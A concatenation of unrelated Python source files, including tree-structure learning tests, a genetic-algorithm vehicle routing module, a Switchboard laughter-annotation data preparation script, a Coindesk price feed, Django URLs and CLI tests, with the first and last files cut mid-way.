self.assertCountEqual(dag.nodes(), ["A", "B", "C", "D", "E"])
self.assertTrue(nx.is_tree(dag))
# learn tree structure using A as root node
est = TreeSearch(self.data13, root_node="A", n_jobs=n_jobs)
dag = est.estimate(estimator_type="chow-liu", edge_weights_fn=weight_fn)
# check number of nodes and edges are as expected
self.assertCountEqual(dag.nodes(), ["A", "B", "C", "D", "E", "F"])
self.assertCountEqual(
dag.edges(),
[("A", "B"), ("A", "C"), ("B", "D"), ("B", "E"), ("C", "F")],
)
# check tree structure exists
self.assertTrue(dag.has_edge("A", "B"))
self.assertTrue(dag.has_edge("A", "C"))
self.assertTrue(dag.has_edge("B", "D"))
self.assertTrue(dag.has_edge("B", "E"))
self.assertTrue(dag.has_edge("C", "F"))
def test_estimate_tan(self):
for weight_fn in [
"mutual_info",
"adjusted_mutual_info",
"normalized_mutual_info",
]:
for n_jobs in [-1, 1]:
# learn graph structure
est = TreeSearch(self.data22, root_node="R", n_jobs=n_jobs)
dag = est.estimate(
estimator_type="tan", class_node="A", edge_weights_fn=weight_fn
)
# check number of nodes and edges are as expected
self.assertCountEqual(dag.nodes(), ["A", "B", "C", "D", "E", "R"])
self.assertCountEqual(
dag.edges(),
[
("A", "B"),
("A", "C"),
("A", "D"),
("A", "E"),
("A", "R"),
("R", "B"),
("R", "C"),
("R", "D"),
("R", "E"),
],
)
# check directed edge between class and independent variables
self.assertTrue(dag.has_edge("A", "B"))
self.assertTrue(dag.has_edge("A", "C"))
self.assertTrue(dag.has_edge("A", "D"))
self.assertTrue(dag.has_edge("A", "E"))
# check tree structure exists over independent variables
self.assertTrue(dag.has_edge("R", "B"))
self.assertTrue(dag.has_edge("R", "C"))
self.assertTrue(dag.has_edge("R", "D"))
self.assertTrue(dag.has_edge("R", "E"))
def test_estimate_chow_liu_auto_root_node(self):
# learn tree structure using auto root node
est = TreeSearch(self.data12)
# root node selection
weights = est._get_weights(self.data12)
sum_weights = weights.sum(axis=0)
maxw_idx = np.argsort(sum_weights)[::-1]
root_node = self.data12.columns[maxw_idx[0]]
dag = est.estimate(estimator_type="chow-liu")
nodes = list(dag.nodes())
np.testing.assert_equal(nodes[0], root_node)
np.testing.assert_array_equal(nodes, ["D", "A", "C", "B", "E"])
def test_estimate_tan_auto_class_node(self):
# learn tree structure using auto root and class node
est = TreeSearch(self.data22)
# root and class node selection
weights = est._get_weights(self.data22)
sum_weights = weights.sum(axis=0)
maxw_idx = np.argsort(sum_weights)[::-1]
root_node = self.data22.columns[maxw_idx[0]]
class_node = self.data22.columns[maxw_idx[1]]
dag = est.estimate(estimator_type="tan")
nodes = list(dag.nodes())
self.assertEqual(nodes[0], root_node)
self.assertEqual(nodes[-1], class_node)
self.assertEqual(sorted(nodes), sorted(["C", "R", "A", "D", "E", "B"]))
def tearDown(self):
del self.data12
del self.data22
|
412878
|
import base64
import json
from datetime import datetime
from bs4 import Tag
from pymonad.maybe import Maybe
from dataclasses import is_dataclass
from .log import get_logger
from .types import House
json_d = json.JSONEncoder.default
log = get_logger(__file__)
class AusBillsJsonEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, Maybe):
return {"$nothing": None} if \
obj.is_nothing() else {"$just": obj.value}
if isinstance(obj, Tag):
return {"$bs4.tag": obj.encode()}
if isinstance(obj, bytes):
return {"$bytes": base64.encodebytes(obj).decode()}
if is_dataclass(obj):
return dict(**obj.__dict__)
if isinstance(obj, House):
return {"$house": obj.value}
if isinstance(obj, datetime):
return {"$dateIso8601": obj.isoformat()}
log.warning("Got something of unexpected type"
"({}\n\nObj: {}\n\ndir: {}"
.format(type(obj), str(obj), dir(obj)))
return json_d(self, obj)
|
412884
|
from utils.population import Population
from utils.customer import Customer
from utils.depot import Depot
from utils.chromosome import Chromosome
import math
import random
from copy import deepcopy
import numpy as np
from typing import List
def euclidean_distance(source: Customer, target) -> float:
"""
Computes the Euclidean Distance between two (x, y) coordinates
:param source: An instance of `Customer` or `Depot` class
:param target: An instance of `Customer` or `Depot` class
:return: A float number
"""
return math.sqrt(math.pow(source.x - target.x, 2) + math.pow(source.y - target.y, 2))
def initial_routing(depot: Depot) -> None:
"""
Adds `Customer`s sequentially to the `Depot` until accumulated `weight` of `Customer`s, surpasses
the `Depot`'s maximum `capacity.
Note: Between two `separator` `Customer`, constructs a route to be satisfied by a vehicle.
:param depot: An instance of `Depot` class
:return: None
"""
accumulated_weight = 0
separator = Customer(999, depot.x, depot.y, 0, True)
i = 0
while i < depot.len():
if accumulated_weight + depot[i].cost > depot.capacity:
depot.insert(i, separator)
accumulated_weight = 0
i += 1
accumulated_weight += depot[i].cost
i += 1
if not depot[-1].null:
depot.add(separator)
def initialize_routing(instance) -> None:
"""
Adds `Customer`s sequentially to the `Depot` until accumulated `weight` of `Customer`s, surpasses
the `Depot`'s maximum `capacity.
Note: Between two `separator` `Customer`, constructs a route to be satisfied by a vehicle.
:param instance: An instance of `Depot`, 'Chromosome' or 'Population'
:return: None
"""
if instance.__class__.__name__.__contains__('Population'):
for ch in instance:
for d in ch:
initial_routing(d)
elif instance.__class__.__name__.__contains__('Chromosome'):
for d in instance:
initial_routing(d)
else:
initial_routing(instance)
# aliased in C# as "RandomList"
def randomize_customers(chromosome: Chromosome) -> None:
"""
Randomizes all customers in all `Depot`s of the given `Chromsome` a.k.a shuffling.
We use this method to build initial population using random `Chromosome`s.
:param chromosome: An instance of `Chromosome` class.
:return: None
"""
for d in chromosome:
random.shuffle(d.depot_customers)
def clone(chromosome: Chromosome) -> Chromosome:
"""
Clones a Chromosome with all same characteristics
:param chromosome: An instance of `Chromosome` class to be cloned
:return: A cloned `Chromosome`
"""
return deepcopy(chromosome)
# aka TournamentPopulation
def extract_population(population: Population, size: int) -> Population:
"""
Creates a shallow `Population` object with the size of `Size`.
:param population: An instance of `Population` class
:param size: The result `Population` size.
:return: A `Population` class
"""
indices = random.sample(range(0, population.len()), size)
new_population = Population(id=0)
for i in indices:
new_population.add(population[i])
return new_population
def fittest_chromosome(population: Population) -> Chromosome:
"""
Returns the `Chromosome` with maximum `fitness_value` within whole `Population`
:param population: An instance of `Population` class
:return: A single `Chromosome`
"""
return max(population, key=lambda chromosome: chromosome.fitness_value())
def tournament(population: Population, tournament_probability: float = 0.8, size: int = 2) -> Population:
"""
Selects TWO parents to send them to `crossover` step based on `tournament` approach.
Tournament approach:
1. Select a random unique sample from the population
2. Draw a random number; if it is below `tournament_probability` hyper-parameter do 3, else do 5
3. Select another random unique sample from the population
4. Find fittest chromosomes from each sampled populations and return them as new population.
5. Randomly choose two chromosomes and return them as a new population.
Note: if samples be same, then fittest `chromosome` of the samples both will be same `Chromosome`s. So as we want to
pass the result of `tournament` to `cross_over`, the cross over operation is asexual or single-parent.
:param population: An instance of `Population` class
:param tournament_probability: The probability of using fittest or random sample (=0.8)
:param size: The size of population to be sampled. By default, we use Binary tournament.
:return: A `Population` with size of `size`
"""
# we create new objects to make sure asexual can happen too. (all methods are by reference)
first_fittest = Chromosome(7770, -1)
second_fittest = Chromosome(7771, -1)
first_sample = extract_population(population, size)
if random.random() <= tournament_probability:
second_sample = extract_population(population, size)
first = fittest_chromosome(first_sample)
second = fittest_chromosome(second_sample)
for new, found in zip([first_fittest, second_fittest], [first, second]):
new.chromosome = found.get_all()
new.id = found.id
new.fitness = found.fitness
new.capacity = found.capacity
new.size = found.size
return Population(0, [first_fittest, second_fittest])
else:
indices = random.sample(range(0, first_sample.len()), 2)
first = first_sample[indices[0]]
second = first_sample[indices[1]]
for new, found in zip([first_fittest, second_fittest], [first, second]):
new.chromosome = found.get_all()
new.id = found.id
new.fitness = found.fitness
new.capacity = found.capacity
new.size = found.size
return Population(0, [first_fittest, second_fittest])
def extract_random_route(chromosome: Chromosome, delete=True) -> (List[Customer], int, int, int):
"""
Extracts a random route within a random `Depot` in given `Chromosome`.
Note: A route defined is indicated by the `Customer`s between two `null` `Customer`s.
:param chromosome: A `Chromosome` to be searched for route
:param delete: Whether delete the extracted route from `Chromosome` or not.
:return: A tuple of (List of `Customer`s, depot, start and end index)
"""
rand_depot_index = random.randint(0, chromosome.len() - 1)
rand_depot: Depot = chromosome[rand_depot_index]
rand_route_idx = random.randint(0, rand_depot.route_ending_index().__len__() - 1)
rand_route_end_idx = rand_depot.route_ending_index()[rand_route_idx]
if rand_route_idx == 0:
rand_route_start_idx = 0
route = rand_depot[rand_route_start_idx: rand_route_end_idx + 1]
if delete:
for c in reversed(route): # use `reversed` or we loose the `null customer` index
rand_depot.remove(c)
return route, rand_depot_index, rand_route_start_idx, rand_route_end_idx
else:
rand_route_start_idx = rand_depot.route_ending_index()[rand_route_idx - 1]
route = rand_depot[rand_route_start_idx + 1: rand_route_end_idx + 1]
if delete:
for c in reversed(route): # use `reversed` or we loose the `null customer` index
rand_depot.remove(c)
return route, rand_depot_index, rand_route_start_idx, rand_route_end_idx
def extract_route_from_depot(depot: Depot, route_idx: int, return_separator=False) -> (List[Customer], int, int):
"""
Extracts a route with respect to the `route_idx` from the given `Depot`.
Note: A route defined is indicated by the `Customer`s between two `null` `Customer`s.
:param depot: A `Depot` to be searched
:param route_idx: An int number representing the n'th route in `Depot`
:param return_separator: Whether returning the `null` `Customer` as the end of route or not.
:return: A tuple of (`List` of `Customer`s, route_start_idx, route_end_idx).
"""
if route_idx >= depot.route_ending_index().__len__():
raise Exception('There are not "{}" routes, try numbers between [0,{}] as "route_idx".'
.format(route_idx, depot.routes_ending_indices.len() - 1))
route_end_idx = depot.route_ending_index()[route_idx]
if route_idx == 0:
route_start_idx = 0
if return_separator:
route = depot[route_start_idx: route_end_idx + 1]
return route, route_start_idx, route_end_idx + 1
route = depot[route_start_idx: route_end_idx]
return route, route_start_idx, route_end_idx
else:
route_start_idx = depot.route_ending_index()[route_idx - 1]
if return_separator:
route = depot[route_start_idx + 1: route_end_idx + 1]
return route, route_start_idx + 1, route_end_idx + 1
route = depot[route_start_idx + 1: route_end_idx]
return route, route_start_idx + 1, route_end_idx
def insert_customer(customer: Customer, chromosome: Chromosome) -> (int, int, int):
"""
Inserts a `Customer` from randomly removed route of a `Depot` at a optimal place in `Chromosome`.
The optimal place can be found using following steps:
1. Find the nearest `Depot` to the given `Customer` using `euclidean_distance` function.
2. Calculate the `cost` and `distance` between all members of all routes of the the chosen `Depot` from previous
step
3. Now the code calculates the distance in each route in the selected `Depot` if we add the `Customer` in all routes
from index 0 to the routes' lengths. Then we add customer in the route with minimum distance regarding the
capacity constraint on each `Depot`.
4. Finally the code returns the index of `Depot` and the position the `Customer` has been added.
:param customer: A `Customer` to be inserted in `Chromosome`
:param chromosome: An instance of `Chromosome` class
:return: A tuple of (the `Depot` index, insert index)
"""
nearest_depot_index = int(np.argmin([euclidean_distance(customer, d) for d in chromosome]))
nearest_depot = chromosome[nearest_depot_index]
distances = []
costs = []
min_distance = 99999999 # +inf
insert_index = -1
route_index = -1
depot_temp = Customer(-1, nearest_depot.x, nearest_depot.y, 0, False) # to calculate distance between depot
# and customers and will be removed after inserting new `Customer`
for i in range(nearest_depot.routes_ending_indices.__len__()):
route, _, _ = extract_route_from_depot(nearest_depot, i, False)
route.insert(0, depot_temp)
distances.append(sum([euclidean_distance(route[i - 1], route[i]) for i, _ in enumerate(route)]))
costs.append(sum([c.cost for c in route]))
if customer.cost + costs[i] <= nearest_depot.capacity:
for ci in range(route.__len__()):
t1 = euclidean_distance(route[ci], route[(ci + 1) % route.__len__()])
t2 = euclidean_distance(route[ci], customer) + euclidean_distance(customer,
route[(ci + 1) % route.__len__()])
t3 = distances[i] - t1 + t2
if min_distance > t3:
min_distance = t3
route_index = i
insert_index = ci
route.remove(depot_temp)
if route_index > 0:
insert_index += nearest_depot.route_ending_index()[route_index - 1] + 1
if route_index == -1:
separator = Customer(9999, nearest_depot.x, nearest_depot.y, 0, True)
nearest_depot.add(customer)
nearest_depot.add(separator)
insert_index = nearest_depot.len() - 2
else:
nearest_depot.insert(insert_index, customer)
return nearest_depot_index, insert_index
def cross_over(parents: Population) -> (Population, List[Customer], List[Customer]):
"""
Gets a `Population` instance consisting of two `Chromosome`s and apply cross over on the parents based the
following steps:
1. First a random route need to be selected and also removed from the both `Chromosome`s
using `extract_random_route` function. (both extraction and deletion will be done by this function)
2. The randomly chosen route's `Customer`s from parent "1" will be added to the "second" parent using
'insert_customer' method. Furthermore, the randomly chosen route's `Customer`s from parent "2" will be added
to the "first" parent using aforementioned method too.
:param parents: An instance of `Population` class with "two" `Chromosome`s
:return: A `Population` class with "two" `Chromosome`s which has been obtained after cross-over.
"""
first_parent, second_parent = parents[0], parents[1]
first_route = extract_random_route(first_parent, True)[0][:-1]
second_route = extract_random_route(second_parent, True)[0][:-1]
for c in first_route:
insert_customer(c, second_parent)
for c in second_route:
insert_customer(c, first_parent)
crossed_parents = Population(6969, [first_parent, second_parent])
return crossed_parents, first_route, second_route
def generate_chromosome_sample(depots: List[Depot], customers: List[Customer], out: Chromosome = None) -> Chromosome:
"""
Gets a list of `Depot`s and `Customer`s and creates a new `Chromosome` regarding these information.
Note: input `Depot` are only `Depot` objects and contains no `Customer` in it, so to fill those `Depot`s,
we assign each `Customer` to its NEAREST `Depot` based on `euclidean_distance` metric.
:param depots: A list of empty `Depot`s
:param customers: A list of `Customer`s to be distributed between `Depot`s in the final `Chromosome`
:param out: A `Chromosome` type object to be used instead of creating new instance. (All values will be overridden)
:return: A filled `Chromosome`
"""
if out is None:
out = Chromosome(1001, depots[0].capacity, -1, depots)
for c in customers:
depots[int(np.argmin([euclidean_distance(c, d) for d in depots]))].add(c)
return out
def generate_initial_population(sample: Chromosome, size: int) -> Population:
"""
This method generates an instance of `Population` class with size of `size` and filled with `sample` `Chromosome`
which is same. It means we will have a `Population` of cloned `Chromosome`s.
:param sample: A `Chromosome` to be cloned and disseminated in search area
:param size: The size of the `Population`
:return: A `Population` instance
"""
chromosomes = [clone(sample) for i in range(size)]
for ch in chromosomes:
initialize_routing(ch)
randomize_customers(ch)
population = Population(-6, chromosomes)
return population
def generate_new_population(population: Population):
"""
Generates new `Population` by crossing over winners of tournament algorithm over the whole input `Population`.
Note: We always save the fittest for next generation, if it causes size mismatch, we remove latest new `Chromosome`.
:param population: An initialized instance of`Population`
:return: An evolved instance `Population`
"""
new_population = Population(123, [fittest_chromosome(population)])
while new_population.len() < population.len():
crossed_parents = cross_over(tournament(population, 0.8, population.len()))
for ch in crossed_parents:
new_population.add(ch)
if new_population.len() > population.len():
new_population.remove_at(-1)
return new_population
|
412904
|
import requests
from . import FeedSource, _request_headers
class Coindesk(FeedSource):
def _fetch(self):
feed = {}
url = "https://api.coindesk.com/v1/bpi/currentprice/{base}.json"
for base in self.bases:
for quote in self.quotes:
if quote != 'BTC':
raise Exception('Coindesk FeedSource only handle BTC quotes.')
response = requests.get(url=url.format(
base=base
), headers=_request_headers, timeout=self.timeout)
result = response.json()
self.add_rate(feed, base, quote, float(result['bpi'][base]['rate_float']), 1.0)
return feed
|
412952
|
import sys, time, librosa, os, argparse, pickle, numpy as np
sys.path.append('../')
sys.path.append('../utils/')
import dataset_utils, audio_utils, data_loaders
sys.path.append('./Evaluation')
from eval_utils import *
warnings.simplefilter("ignore")
from tqdm import tqdm
import pandas as pd
from tqdm import tqdm
from joblib import Parallel, delayed
from sklearn.utils import shuffle
MIN_GAP=0. # Only use if we want to enforce gap between annotations
# Load Switchboard data
t_root = '../data/switchboard/switchboard-1/swb_ms98_transcriptions/'
a_root = '../data/switchboard/switchboard-1/97S62/'
all_audio_files = librosa.util.find_files(a_root,ext='sph')
train_folders, val_folders, test_folders = dataset_utils.get_train_val_test_folders(t_root)
train_transcription_files_A, train_audio_files = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(train_folders, 'A'), all_audio_files)
train_transcription_files_B, _ = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(train_folders, 'B'), all_audio_files)
val_transcription_files_A, val_audio_files = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(val_folders, 'A'), all_audio_files)
val_transcription_files_B, _ = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(val_folders, 'B'), all_audio_files)
test_transcription_files_A, test_audio_files = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(test_folders, 'A'), all_audio_files)
test_transcription_files_B, _ = dataset_utils.get_audio_files_from_transcription_files(dataset_utils.get_all_transcriptions_files(test_folders, 'B'), all_audio_files)
# Get stats on the Laughter/Non-Laughter classes in the Audioset Annotations
# So that we can use these stats to resample from the switchboard test set
# Sample the Switchboard test data to be roughly proportional to what we have from the Audioset annotations
# in terms of class balance (~39.3% laughter)
# Do this by extending the audio files in each direction for the annotated laughter
audioset_annotations_df = pd.read_csv('../data/audioset/annotations/clean_laughter_annotations.csv')
print("\nAudioset Annotations stats:")
total_audioset_minutes, total_audioset_laughter_minutes, total_audioset_non_laughter_minutes, audioset_laughter_fraction, audioset_laughter_count = get_annotation_stats(audioset_annotations_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
import torch
from torch import optim, nn
class AllocationModel(nn.Module):
def __init__(self, total_time, available_time_per_clip):
super().__init__()
self.total_time = total_time
self.available_time_per_clip = available_time_per_clip
self.allocated_times = nn.Parameter(torch.zeros(len(available_time_per_clip)), requires_grad=True)
def forward(self):
total_time_used = torch.sum(self.allocated_times)
leftover_times = self.available_time_per_clip - self.allocated_times
total_time_loss = torch.abs(self.total_time - total_time_used)
min_time = torch.min(leftover_times)
leftover_loss = 1/(min_time)
loss = total_time_loss + leftover_loss
self.allocated_times.data = torch.clamp(self.allocated_times, 0)
self.allocated_times.data = torch.min(self.allocated_times, self.available_time_per_clip)
return loss, self.allocated_times
def distribute_time(total_time, available_time_per_clip):
am = AllocationModel(torch.tensor(total_time), torch.tensor(available_time_per_clip))
optimizer = optim.Adam(am.parameters(),lr=0.1)
for i in range(300):
optimizer.zero_grad()
loss, times = am()
loss.backward(retain_graph=True)
optimizer.step()
am.zero_grad()
#import pdb; pdb.set_trace()
times = torch.clamp(times, 0)
return np.nan_to_num(times.detach().cpu().numpy())
def get_10_second_clips(regions_list, audio_file_path, full_audio_file_length,
index, audioset_laughter_fraction, adjustment_amount=0):
if len(regions_list) == 0:
return [],[],0,0
# First pass to find clips
all_clips = []
current_start = None; current_end = None
for i in range(len(regions_list)):
if current_start is None:
current_start = regions_list[i][0]
beginning_space = current_start
if regions_list[i][0] + regions_list[i][1] > current_start + 10:
all_clips.append({'window': [current_start, current_end],
'beginning_buffer':0., 'end_buffer':0.,
'beginning_space': beginning_space})
current_start = regions_list[i][0]
beginning_space = current_start - current_end # new start point to old end point
current_end = regions_list[i][0] + regions_list[i][1]
if current_start is not None and current_end is not None:
end_space = full_audio_file_length - current_end
all_clips.append({'window': [current_start, current_end],
'beginning_buffer':0., 'end_buffer':0.,
'beginning_space': beginning_space,
'end_space': end_space})
for i, clip in enumerate(all_clips):
if 'end_space' not in clip: clip['end_space'] = all_clips[i+1]['beginning_space']
#clip_len = clip['window'][1] - clip['window'][0]
# 2nd pass: Go through, extending by 0.5 secs on each side unless it exceeds 10 seconds
for i, clip in enumerate(all_clips):
start, end = clip['window']
length = end-start
# Try adding 0.5s to begin and end, if not possible, print and give up
time_to_add_per_side = 0.5
# Try adding to beginning and end
if time_to_add_per_side < clip['beginning_space'] and time_to_add_per_side < clip['end_space']:
clip['window'] = [start-time_to_add_per_side, end + time_to_add_per_side]
clip['beginning_space'] -= time_to_add_per_side; clip['end_space'] -= time_to_add_per_side
clip['beginning_buffer'] += 0.5; clip['end_buffer'] += 0.5
if i > 0:
all_clips[i-1]['end_space'] -= time_to_add_per_side
if i < len(all_clips) - 1:
all_clips[i+1]['beginning_space'] -= time_to_add_per_side
# 3rd pass: Go back through, centering and extending windows out to 10s
for i, clip in enumerate(all_clips):
start, end = clip['window']
length = end-start
# Try adding equally to begin and end, if not possible, try one side, if not possible, print and give up
time_to_add = np.maximum(10 - length, 0) # If longer than 10 secs, don't shorten it, just leave it
time_to_add_per_side = time_to_add / 2
# Try adding to beginning and end
if time_to_add_per_side < clip['beginning_space'] and time_to_add_per_side < clip['end_space']:
clip['window'] = [start-time_to_add_per_side, end + time_to_add_per_side]
clip['beginning_space'] -= time_to_add_per_side; clip['end_space'] -= time_to_add_per_side
clip['beginning_buffer'] += time_to_add_per_side; clip['end_buffer'] += time_to_add_per_side
if i > 0:
all_clips[i-1]['end_space'] -= time_to_add_per_side
if i < len(all_clips) - 1:
all_clips[i+1]['beginning_space'] -= time_to_add_per_side
elif time_to_add < clip['beginning_space']:
clip['window'] = [start-time_to_add, end]
clip['beginning_buffer'] += time_to_add
if i > 0:
all_clips[i-1]['end_space'] -= time_to_add
elif time_to_add < clip['end_space']:
clip['window'] = [start, end+time_to_add]
clip['end_buffer'] += time_to_add
if i < len(all_clips) - 1:
all_clips[i+1]['beginning_space'] -= time_to_add
else:
pass
if clip['beginning_buffer'] < 0 and clip['beginning_buffer'] > -0.1: clip['beginning_buffer']=0.
if clip['end_buffer'] < 0 and clip['end_buffer'] > -0.1: clip['end_buffer']=0.
# 4th pass: Compute the class-balance (laughter fraction) for this conversation
total_window_time = sum([clip['window'][1] - clip['window'][0] for clip in all_clips])
total_laughter_time = sum([region[1] for region in regions_list])
swb_laughter_fraction = total_laughter_time / total_window_time
# Tweak this adjustment_amount to find a value for which after everything
# The class balances match
intended_window_time = total_laughter_time/(audioset_laughter_fraction) + adjustment_amount
# 5th pass: Trim back the clips to match the class-balance distribution of the Audioset Annotations
# Need to reduce the windows to cut 'total_window_time' down to 'intended_window_time'
# Try to distribute the time so that all windows are close to the same size
time_to_reduce = total_window_time - intended_window_time
#available_time_per_clip = [clip['beginning_buffer']+clip['end_buffer'] for clip in clips]
beginning_buffers = [clip['beginning_buffer'] for clip in all_clips]
end_buffers = [clip['end_buffer'] for clip in all_clips]
all_buffers = beginning_buffers + end_buffers
time_to_reduce_per_buffer = distribute_time(time_to_reduce, all_buffers)
beginning_buffer_updates, end_buffer_updates = np.split(time_to_reduce_per_buffer,2)
try:
for i, clip in enumerate(all_clips):
assert(clip['beginning_buffer'] >= 0)
assert(clip['end_buffer'] >= 0)
except:
pass
#import pdb; pdb.set_trace()
try:
assert(len(beginning_buffer_updates) == len(all_clips))
assert(len(end_buffer_updates) == len(all_clips))
except:
pass
#import pdb; pdb.set_trace()
for i, clip in enumerate(all_clips):
clip['window'][0] += beginning_buffer_updates[i]; clip['beginning_space'] += beginning_buffer_updates[i]
clip['beginning_buffer'] -= beginning_buffer_updates[i]
clip['window'][1] -= end_buffer_updates[i]; clip['end_space'] += end_buffer_updates[i]
clip['end_buffer'] -= end_buffer_updates[i]
if clip['beginning_buffer'] < 0 and clip['beginning_buffer'] > -0.1: clip['beginning_buffer']=0.
if clip['end_buffer'] < 0 and clip['end_buffer'] > -0.1: clip['end_buffer']=0.
try:
assert(clip['beginning_buffer'] >= 0)
assert(clip['end_buffer'] >= 0)
except:
pass
#import pdb; pdb.set_trace()
# 6th pass: Re-Compute the class-balance (laughter fraction) for this conversation
total_window_time = sum([clip['window'][1] - clip['window'][0] for clip in all_clips])
total_laughter_time = sum([region[1] for region in regions_list])
swb_laughter_fraction = total_laughter_time / total_window_time
intended_window_time = total_laughter_time/audioset_laughter_fraction
# Now make the dataframe
rows = []
# For each window, grab each laughter region that's inside it and mark that relative to the window start
for i, clip in enumerate(all_clips):
inside_regions = [r for r in regions_list if audio_utils.times_overlap(
clip['window'][0], clip['window'][1],r[0],r[0]+r[1])]
if len(inside_regions) > 5:
pass
#import pdb; pdb.set_trace()
h = {'FileID': audio_file_path.split('/')[-1].split('.')[0],
'audio_path': audio_file_path,
'audio_length': full_audio_file_length,
'window_start': clip['window'][0],
'window_length': clip['window'][1]-clip['window'][0]
}
for j in range(5):
if j == 0:
start_key = 'Start'; end_key = 'End'
else:
start_key = f'Start.{j}'; end_key = f'End.{j}'
if len(inside_regions) > j:
r = inside_regions[j]
h[start_key] = r[0]; h[end_key] = r[0] + r[1]
else:
h[start_key] = np.nan; h[end_key] = np.nan
if h['window_length'] > 1.:
rows.append(h)
return rows, all_clips, total_laughter_time, total_window_time
def make_switchboard_dataframe(t_files_A, t_files_B, a_files, adjustment_amount=0,include_words=False):
all_rows = []; all_clips = []; all_laughter_time = []; all_window_time = []
all_laughter_regions = []
for index in tqdm(range(len(a_files))):
full_audio_file_length = get_audio_file_length(a_files[index])
laughter_regions, speech_regions, _, _ = dataset_utils.get_laughter_regions_and_speech_regions(
t_files_A[index], t_files_B[index], a_files[index], include_words=include_words)
all_laughter_regions.append(laughter_regions)
rows, clips, laughter_time, window_time = get_10_second_clips(
laughter_regions, a_files[index],full_audio_file_length,
index, audioset_laughter_fraction, adjustment_amount=adjustment_amount)
all_rows += rows
all_clips.append(clips)
all_laughter_time.append(laughter_time)
all_window_time.append(window_time)
total_laughter_time = sum(all_laughter_time)
total_window_time = sum(all_window_time)
df = pd.DataFrame(all_rows)
return df
def make_switchboard_distractor_dataframe(t_files_A, t_files_B, a_files, total_distractor_clips=None):
rows = []
for i in tqdm(range(len(t_files_A))):
t_file_A = t_files_A[i]
t_file_B = t_files_B[i]
a_file = a_files[i]
full_audio_file_length = get_audio_file_length(a_file)
laughter_regions, _, _, _ = dataset_utils.get_laughter_regions_and_speech_regions(
t_file_A, t_file_B, a_file, include_words=True)
laughter_regions = [{'start':r[0], 'end':r[0]+r[1]} for r in laughter_regions]
non_laughter_regions = get_non_laughter_times(laughter_regions, 0,
full_audio_file_length, avoid_edges=True, edge_gap=0.5)
for r in non_laughter_regions:
if r['end'] - r['start'] > 10:
start_point = r['start'] + (r['end']-r['start']-10)/2
end_point = start_point + 10
h = {'FileID': a_file.split('/')[-1].split('.')[0],
'audio_path': a_file,
'audio_length': full_audio_file_length,
'window_start': start_point,
'window_length': 10.
}
for j in range(5):
if j == 0:
start_key = 'Start'; end_key = 'End'
else:
start_key = f'Start.{j}'; end_key = f'End.{j}'
h[start_key] = np.nan; h[end_key] = np.nan
rows.append(h)
if total_distractor_clips is not None:
rows = rows[0:total_distractor_clips]
return pd.DataFrame(rows)
swb_val_distractor_df = make_switchboard_distractor_dataframe(
val_transcription_files_A, val_transcription_files_B, val_audio_files, total_distractor_clips=153)
swb_val_distractor_df.to_csv('../data/switchboard/annotations/clean_switchboard_val_distractor_annotations.csv', index=None)
swb_test_distractor_df = make_switchboard_distractor_dataframe(
test_transcription_files_A, test_transcription_files_B, test_audio_files, total_distractor_clips=203)
swb_test_distractor_df.to_csv('../data/switchboard/annotations/clean_switchboard_test_distractor_annotations.csv', index=None)
swb_train_df = make_switchboard_dataframe(
train_transcription_files_A, train_transcription_files_B, train_audio_files, adjustment_amount=-1.1)
print("\nSWB Train Annotations stats:")
_, _, _, _, _ = get_annotation_stats(
swb_train_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
swb_train_df.to_csv('../data/switchboard/annotations/clean_switchboard_train_laughter_annotations.csv', index=None)
swb_val_df = make_switchboard_dataframe(
val_transcription_files_A, val_transcription_files_B, val_audio_files, adjustment_amount=-1.1)
print("\nSWB Val Set Annotations stats:")
_, _, _, _, _ = get_annotation_stats(
swb_val_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
swb_val_df.to_csv('../data/switchboard/annotations/clean_switchboard_val_laughter_annotations.csv', index=None)
swb_test_df = make_switchboard_dataframe(
test_transcription_files_A, test_transcription_files_B, test_audio_files, adjustment_amount=1.2)
print("\nSWB Test Set Annotations stats:")
_, _, _, _, _ = get_annotation_stats(
swb_test_df, display=True, min_gap = MIN_GAP, avoid_edges=True, edge_gap=0.5)
swb_test_df.to_csv('../data/switchboard/annotations/clean_switchboard_test_laughter_annotations.csv', index=None)
|
412999
|
from tastypie.api import Api
from django.conf.urls import patterns, include, url
from bikecompetition.bc import api, actions
bc_api = Api(api_name='bc')
bc_api.register(api.CompetitionResource())
bc_api.register(api.CompetitorResource())
urlpatterns = patterns('',
url(r'^api/', include(bc_api.urls)),
url(r'^api/action/get_competitor/', actions.get_competitor),
url(r'^api/action/get_competition/', actions.get_competition),
url(r'^api/action/update_competition/', actions.update_competition),
url(r'^api/action/finish_competition/', actions.finish_competition),
url(r'^api/bc/doc/',
include('tastypie_swagger.urls', namespace='tastypie_swagger')),
)
|
413057
|
def convert_sample_to_shot_coQA(sample, with_knowledge=None):
prefix = f"{sample['meta']}\n"
for turn in sample["dialogue"]:
prefix += f"Q: {turn[0]}" +"\n"
if turn[1] == "":
prefix += f"A:"
return prefix
else:
prefix += f"A: {turn[1]}" +"\n"
return prefix
|
413067
|
import unittest
from binstar_client.tests.fixture import CLITestCase
from binstar_client.tests.urlmock import urlpatch
from binstar_client.scripts.cli import main
from binstar_client import errors
class Test(CLITestCase):
@urlpatch
def test_show(self, urls):
urls.register(
method='GET',
path='/groups/org',
content='{"groups": [{"name":"grp", "permission": "read"}]}',
)
main(['--show-traceback', 'groups', 'show', 'org'], False)
urls.assertAllCalled()
@urlpatch
def test_show_group(self, urls):
urls.register(
method='GET',
path='/group/org/owners',
content='{"name": "owners", "permission": "read", "members_count": 1, "repos_count": 1}',
)
main(['--show-traceback', 'groups', 'show', 'org/owners'], False)
urls.assertAllCalled()
@urlpatch
def test_create(self, urls):
urls.register(
method='POST',
path='/group/org/new_grp',
status=204,
)
main(['--show-traceback', 'groups', 'add', 'org/new_grp'], False)
urls.assertAllCalled()
@urlpatch
def test_create_missing_group(self, urls):
with self.assertRaisesRegexp(errors.UserError, 'Group name not given'):
main(['--show-traceback', 'groups', 'add', 'org'], False)
@urlpatch
def test_add_member(self, urls):
urls.register(
